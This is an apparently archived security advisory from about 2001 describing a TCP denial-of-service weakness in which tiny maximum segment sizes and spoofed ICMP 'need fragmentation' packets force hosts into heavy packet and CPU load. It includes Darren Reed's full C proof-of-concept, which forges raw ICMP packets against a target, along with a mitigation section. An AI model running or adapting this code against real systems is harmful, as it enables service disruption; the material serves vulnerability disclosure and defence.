COMMAND
TCP/IP
SYSTEMS AFFECTED
most systems
PROBLEM
Darren Reed found following. On a lan far far away, a rouge
packet was heading towards a server, ready to start up a new
storm ...
If any of you have tested what happens to the ability of a box to
perform well when it has a small MTU you will know that setting
the MTU to (say) 56 on a diskless thing is a VERY VERY bad idea
when NFS read/write packets are generally 8k in size. Do not try
it on a NFS thing unless you plan to reboot it, ok ? Last time
Darren did this was when he worked out you could fragment packets
inside the TCP header and that lesson was enough for him.
Following on from this, it occurs to me that the problem with the
above can possibly be reproduced with TCP. How? That thing
called "maximum segment size". The problem? Well, the first is
that there does not appear to be a minimum. The second is that
it is negoiated by the caller, not callee. Did we hear someone
say "oh dear"?
What's this mean? Well, if we connect to www.microsoft.com and
set our MSS to 143 (say), they need to send us 11 packets for
every one they would normally send us (with an MSS of 1436).
Total output for them is 1876 bytes - a 30% increase. However,
that's not the real problem. Our experience is that hosts,
especially PC's, have a lot of trouble handling *LOTS* of
interrupts. To send 2k out via the network, it's no longer 2
packets but 20+ - a significant increase in the workload.
A quick table (based on 20byte IP & TCP header):
datalen mss packets total bytes bytes %increase
1436 1436 1 1476 0
1436 1024 2 1516 3%
1436 768 2 1516 3%
1436 512 3 1556 5%
1436 256 6 1676 13%
1436 128 12 1916 30%
1436 64 23 2356 69%
1436 32 45 3236 119%
1426 28 52 3516 238% (MTU = 68)
1436 16 90 5036 241%
1436 8 180 8636 485%
1436 1 1436 58876 3989%
For Solaris, you can enforce a more sane minimum MSS than the
install default (1) with ndd:
ndd -set /dev/tcp tcp_mss_min 128
HP-UX 11.* is in the same basket as Solaris.
*BSD have varying minimums well above 1 - NetBSD at 32, FreeBSD
at 64. (OpenBSD's comment on this says 32 but the code says 64).
Linux 2.4 is 88
We can't see anything in the registry or MSDN which says what it
is for Windows. By experimentation, Win2000 appears to be 88,
NT 4 appears to be 1
Nothing else besides Solaris seems to have anything close to a
reasonable manner in which to tune the minimum value. What's most
surprising is that there does not appear to be a documented
minimum, just as there is no "minimum MTU" size for IP. If there
is, please correct us.
About the only bonus to this is that there does not appear to be
an easy way to affect the MSS sent in the initial SYN packet.
Oh, so how's this a potential denial of service attack? Generally
network efficiency comes through sending lots of large packets...
but don't tell ATM folks that, of course. Does it work? *shrug*
It is not easy to test...the only testing Darren could do (with
NetBSD) was to use the TCP_MAXSEG setsockopt BUT this only affects
the sending MSS (now what use is that?), but in testing, changing
it from the default 1460 to 1 caused number of packets to go from
9 to 2260 to write 1436 bytes of data to discard. To send 100 *
1436 from the NetBSD box to Solaris8 took 60 seconds (MSS of 1)
vs ~1 with an MSS of 1460. Of even more significance, one
connection like this made almost no difference after the first
run but running a second saw kernel CPU jump to 30% on an SS20/712
(we suspect there are some serious TCP tuning happening
dynamically). The sending host was likewise afflicted with a
signifcant CPU usage penalty if more than one was running. There
were some very surprising things happening too - with just one
session active, ~170-200pps were seen with netstat on Solaris,
but with the second, it was between 1750 and 1850pps. Can you
say "ACK storm"? Oh, and for fun you can enable TCP timestamping
just to make those headers bigger and run the system a bit harder
whilst processing packets!
Darren didn't investigated the impact of ICMP PMTU discovery, but
from his reading of at least the BSD source code, the MTU for the
route will be ignored if it is less than the default MSS when
sending out the TCP SYN with the MSS option. That aside, it will
still impact current connections and would appear to be a way to
force the _current_ MSS below that set at connect time. On BSD,
it will not accept PMTU updates if the MTU is less than 296, on
Solaris8 and Linux 2.4 it just needs to be above 68 (hmmm, allows
you to get an effective MSS of less than 88).
/*
* (C)Copyright 2001 Darren Reed.
*
* maxseg.c
*/
#include <sys/types.h>
#include <sys/param.h>
#include <sys/socket.h>
#if BSD >= 199306
#include <sys/sysctl.h>
#endif
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <netinet/ip_var.h>
#include <netinet/tcp.h>
#include <netinet/tcp_timer.h>
#include <netinet/tcp_var.h>
#include <time.h>
#include <fcntl.h>
#include <errno.h>
void prepare_icmp(struct sockaddr_in *);
void primedefaultmss(int, int);
u_short in_cksum(u_short *, int);
int icmp_unreach(struct sockaddr_in *, struct sockaddr_in *);
#define NEW_MSS 512
#define NEW_MTU 1500
static int start_mtu = NEW_MTU;
void primedefaultmss(fd, mss)
int fd, mss;
{
#ifdef __NetBSD__
static int defaultmss = 0;
int mib[4], msso, mssn;
size_t olen;
if (mss == 0)
mss = defaultmss;
mssn = mss;
olen = sizeof(msso);
mib[0] = CTL_NET;
mib[1] = AF_INET;
mib[2] = IPPROTO_TCP;
mib[3] = TCPCTL_MSSDFLT;
if (sysctl(mib, 4, &msso, &olen, NULL, 0))
err(1, "sysctl");
if (defaultmss == 0)
defaultmss = msso;
if (sysctl(mib, 4, 0, NULL, &mssn, sizeof(mssn)))
err(1, "sysctl");
if (sysctl(mib, 4, &mssn, &olen, NULL, 0))
err(1, "sysctl");
printf("Default MSS: old %d new %d\n", msso, mssn);
#endif
#if HACKED_KERNEL
int opt;
if (mss)
op = mss;
else
op = 512;
if (setsockopt(fd, IPPROTO_TCP, TCP_MAXSEG+1, (char *)&op, sizeof(op)))
err(1, "setsockopt");
#endif
}
int
main(int argc, char *argv[])
{
struct sockaddr_in me, them;
int fd, op, olen, mss;
char prebuf[16374];
time_t now1, now2;
struct timeval tv;
mss = NEW_MSS;
primedefaultmss(-1, mss);
fd = socket(AF_INET, SOCK_STREAM, 0);
if (fd == -1)
err(1, "socket");
memset((char *)&them, 0, sizeof(me));
them.sin_family = AF_INET;
them.sin_port = ntohs(atoi(argv[2]));
them.sin_addr.s_addr = inet_addr(argv[1]);
primedefaultmss(fd, mss);
op = fcntl(fd, F_GETFL, 0);
if (op != -1) {
op |= O_NONBLOCK;
fcntl(fd, F_SETFL, op);
}
op = 1;
(void) setsockopt(fd, SOL_SOCKET, TCP_NODELAY, &op, sizeof(op));
if (connect(fd, (struct sockaddr *)&them, sizeof(them)) &&
(errno != EINPROGRESS))
err(1, "connect");
olen = sizeof(op);
if (!getsockopt(fd, IPPROTO_TCP, TCP_MAXSEG, (char *)&op, &olen))
printf("Remote mss %d\n", op);
else
err(1, "getsockopt");
#if HACKED_KERNEL
olen = sizeof(op);
if (!getsockopt(fd, IPPROTO_TCP, TCP_MAXSEG+1, (char *)&op, &olen))
printf("Our mss %d\n", op);
else
err(1, "getsockopt(+1)");
#endif
olen = sizeof(me);
if (getsockname(fd, (struct sockaddr *)&me, &olen))
err(1, "getsockname");
(void) read(fd, prebuf, sizeof(prebuf));
now1 = time(NULL);
for (op = 2; op; op--) {
icmp_unreach(&me, &them);
olen = read(fd, prebuf, sizeof(prebuf));
if (olen == -1) {
if (errno == ENOBUFS || errno == EAGAIN ||
errno == EWOULDBLOCK) {
tv.tv_sec = 0;
tv.tv_usec = 10000;
select(3, NULL, NULL, NULL, &tv);
continue;
}
warn("read");
break;
}
}
now2 = time(NULL);
printf("Elapsed time %d\n", now2 - now1);
primedefaultmss(fd, 0);
close(fd);
return 0;
}
/*
* in_cksum() & icmp_unreach() ripped from nuke.c prior to modifying
*/
static char icmpbuf[256];
static int icmpsock = -1;
static struct sockaddr_in destsock;
void
prepare_icmp(dst)
struct sockaddr_in *dst;
{
struct tcphdr *tcp;
struct icmp *icmp;
icmp = (struct icmp *)icmpbuf;
if (icmpsock == -1) {
memset((char *)&destsock, 0, sizeof(destsock));
destsock.sin_family = AF_INET;
destsock.sin_addr = dst->sin_addr;
srand(getpid());
icmpsock = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP);
if (icmpsock == -1)
err(1, "socket");
/* the following messy stuff from Adam Glass (icmpsquish.c) */
memset(icmp, 0, sizeof(struct icmp) + 8);
icmp->icmp_type = ICMP_UNREACH;
icmp->icmp_code = ICMP_UNREACH_NEEDFRAG;
icmp->icmp_pmvoid = 0;
icmp->icmp_ip.ip_v = IPVERSION;
icmp->icmp_ip.ip_hl = 5;
icmp->icmp_ip.ip_len = htons(NEW_MSS);
icmp->icmp_ip.ip_p = IPPROTO_TCP;
icmp->icmp_ip.ip_off = htons(IP_DF);
icmp->icmp_ip.ip_ttl = 11 + (rand() % 50);
icmp->icmp_ip.ip_id = rand() & 0xffff;
icmp->icmp_ip.ip_src = dst->sin_addr;
tcp = (struct tcphdr *)(&icmp->icmp_ip + 1);
tcp->th_sport = dst->sin_port;
}
icmp->icmp_nextmtu = htons(start_mtu);
icmp->icmp_cksum = 0;
}
u_short
in_cksum(addr, len)
u_short *addr;
int len;
{
register int nleft = len;
register u_short *w = addr;
register int sum = 0;
u_short answer = 0;
/*
* Our algorithm is simple, using a 32 bit accumulator (sum),
* we add sequential 16 bit words to it, and at the end, fold
* back all the carry bits from the top 16 bits into the lower
* 16 bits.
*/
while( nleft > 1 ) {
sum += *w++;
nleft -= 2;
}
/* mop up an odd byte, if necessary */
if( nleft == 1 ) {
*(u_char *)(&answer) = *(u_char *)w ;
sum += answer;
}
/*
* add back carry outs from top 16 bits to low 16 bits
*/
sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */
sum += (sum >> 16); /* add carry */
answer = ~sum; /* truncate to 16 bits */
return (answer);
}
int icmp_unreach(src, dst)
struct sockaddr_in *src, *dst;
{
static int donecksum = 0;
struct sockaddr_in dest;
struct tcphdr *tcp;
struct icmp *icmp;
int i, rc;
u_short sum;
icmp = (struct icmp *)icmpbuf;
prepare_icmp(dst);
icmp->icmp_ip.ip_dst = src->sin_addr;
sum = in_cksum((u_short *)&icmp->icmp_ip, sizeof(struct ip));
icmp->icmp_ip.ip_sum = sum;
tcp = (struct tcphdr *)(&icmp->icmp_ip + 1);
tcp->th_dport = src->sin_port;
sum = in_cksum((u_short *)icmp, sizeof(struct icmp) + 8);
icmp->icmp_cksum = sum;
start_mtu /= 2;
if (start_mtu < 69)
start_mtu = 69;
i = sendto(icmpsock, icmpbuf, sizeof(struct icmp) + 8, 0,
(struct sockaddr *)&destsock, sizeof(destsock));
if (i == -1 && errno != ENOBUFS && errno != EAGAIN &&
errno != EWOULDBLOCK)
err(1, "sendto");
return(0);
}
Some people are not understanding the difference between the TCP
MSS and IP's MTU. Either that or both you and David LeBlanc are
grasping at straws in order to make WindowsNT look better.
MTU and Path MTU (PMTU) discovery are not the same as TCP's MSS
but they can and do impact it.
Darren managed to get NT4.0 (workstation) to accept a TCP MSS of 1
(sent lots of data packets out that had 1 byte of data) and he
got Win2000 to accept an MTU of 69 (effective MSS of 17 after TCP
options) through PMTU discovery. Now, if 20+68 is the reason why
88 is the minimum MSS Win2000 will accept then someone doesn't
understand what the word "MTU" means because it referes to the
TOTAL IP datagram length, not the data part.
Using the C program above one is able to get Win2000 to create a
MTU specific path to a local box where the MTU was 69. That's
well under any number over 500 (depending on how you choose to
see the value).
Path MTU discovery has absolutely no interaction with the TCP MSS
except that one would expect it to be used if a cached path
already existed to a host, with an MTU specific for it set, when
initiating or accepting a new TCP connection.
SOLUTION
Quite clearly the host operating system needs to set a much more
sane minimum MSS than 1. Given there is no minimum MTU for IP -
well, maybe "68" - it's hard to derive what it should be.
Anything below 40 should just be banned (that's the point at which
you're transmitting 50% data, 50% headers). Most of the defaults,
above, are chosen because it fits in well with their internal
network buffering (some use a default MSS of 512 rather than
536 for similar reasons). But above that, what do you choose? 80
for a 25/75 or something higher still? Whatever the choice and
however it is calculated, it is not enough to just enforce it
when the MSS option is received. It also needs to be enforced
when the MTU parameter is checked in ICMP "need frag" packets.